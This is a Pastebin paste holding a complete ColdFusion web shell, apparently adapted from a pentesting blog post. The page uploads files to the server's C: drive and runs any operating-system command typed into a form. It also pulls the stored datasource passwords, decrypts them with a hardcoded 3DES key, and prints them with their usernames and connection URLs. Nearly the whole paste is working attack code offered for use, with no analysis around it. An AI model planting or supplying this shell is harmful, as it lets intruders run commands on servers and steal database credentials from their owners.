API tools faq
paste
dooby77

coldfusion shell

dooby77
Jul 13th, 2018
55
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.63 KB | None | 0 0
raw download clone embed print report
  1. <!-- Source: http://www.pwnag3.com/2013/04/coldfusion-for-pentesters-part-2.html -->
  2. <html>
  3. <body>
  4.  
  5. <!-- orig author: kGrutzmacher -->
  6. <!-- additshonz: lawKnee -->
  7. <b>Notes:</b><br>
  8. <ul>
  9. <li>For Windows put this as command "c:\windows\system32\cmd.exe /c" or wherever cmd.exe is<br>
  10. <li>For Windows options are the command you want to run "dir" "type" etc
  11. </ul>
  12. <p>
  13.  
  14. <cfoutput>
  15.  
  16. <cfif isDefined("fileUpload")>
  17. <cffile action="upload"
  18. fileField="fileUpload"
  19. destination="C:\">
  20. <p>Your file has been uploaded.</p>
  21. </cfif>
  22. <form enctype="multipart/form-data" method="post">
  23. <input type="file" name="fileUpload" /><br />
  24. <input type="submit" value="Upload File" />
  25. </form>
  26.  
  27.  
  28. <table>
  29. <form method="POST" action="">
  30. <tr><td>Command:</td><td><input type=text name="cmd" size=50
  31. <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
  32. <tr><td>Options:</td><td> <input type=text name="opts" size=50
  33. <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
  34. <tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
  35. <cfif isdefined("form.timeout")>value="#form.timeout#"
  36. <cfelse>value="5"</cfif>></td></tr>
  37. </table>
  38. <input type=submit value="Exec" >
  39. </form>
  40.  
  41. <cfif isdefined("form.cmd")>
  42. <cfsavecontent variable="myVar">
  43. <cfexecute name = "#Form.cmd#"
  44. arguments = "#Form.opts#"
  45. timeout = "#Form.timeout#">
  46. </cfexecute>
  47. </cfsavecontent>
  48. <pre>
  49. #HTMLCodeFormat(myVar)#
  50. </pre>
  51. </cfif>
  52.  
  53. <cfscript>
  54. //The following code borrowed from hernanOchoa @hexale (thx)
  55. //added better formatting on output and connection string [lb]
  56.  
  57. // Create Data Source Object
  58. dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
  59. getDatasourceService().getDatasources();
  60. writeoutput("<br><br><b>Datasource Credentials:</b><br>");
  61. writeoutput("<table>");
  62. // Loop Through DataSources
  63. for(i in dataSourceObb) {
  64. if(len(dataSourceObb[i]["password"])){
  65.  
  66. // Get url
  67. theurl=(dataSourceObb[i]["url"]);
  68.  
  69. // Get username
  70. username=(dataSourceObb[i]["username"]);
  71.  
  72. // Get and decrypt password
  73. decryptPassword=Decrypt(dataSourceObb[i]["password"],
  74. generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede",
  75. "Base64");
  76.  
  77. // Output datasource usernames, passwords, and urls
  78. writeoutput("" &
  79. "<tr><td>DataSource: " & i & "</td>" &
  80. "<td>Username: " & username & "</td>" &
  81. "<td>Password: " & decryptPassword &
  82. "<td>URL: " & theurl & "</td></tr>");
  83. }
  84. }
  85. writeoutput("</table><br>");
  86. </cfscript>
  87. </cfoutput>
  88. </body>
  89. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!